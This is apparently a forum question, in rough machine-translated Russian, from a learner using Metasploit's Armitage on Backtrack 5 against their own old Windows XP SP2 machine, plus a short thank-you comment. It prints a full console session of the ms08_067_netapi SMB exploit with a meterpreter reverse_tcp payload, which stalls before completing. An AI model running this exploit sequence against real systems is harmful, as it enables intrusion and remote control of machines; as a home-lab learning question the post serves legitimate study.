Я изучаю фреймворк Metasploit, начиная с Armitage, чтобы получить общее представление о структуре и т. Д. Я пытался взломать старую sp2 Windowx XP у меня есть, когда я пытаюсь запустить подвиги я получаю этоBacktrack 5 Armitage MSF
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set LHOST 192.168.18.130
LHOST => 192.168.18.130
msf exploit(ms08_067_netapi) > set RPORT 445
RPORT => 445
msf exploit(ms08_067_netapi) > set LPORT 13592
LPORT => 13592
msf exploit(ms08_067_netapi) > set RHOST 10.0.0.11
RHOST => 10.0.0.11
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > set SMBPIPE BROWSER
SMBPIPE => BROWSER
msf exploit(ms08_067_netapi) > set TARGET 0
TARGET => 0
msf exploit(ms08_067_netapi) > exploit -j
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.18.130:13592
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability...
Я не получаем никаких ошибок, но киоски там и не выполняет эксплойт.
Благодаря человеку, я обязательно посмотрите на эти учебники. Я пытался использовать Kali раньше, но что-то не совсем правильно, когда я его использую. Но я попытаюсь заставить себя продолжать пытаться. – Sloth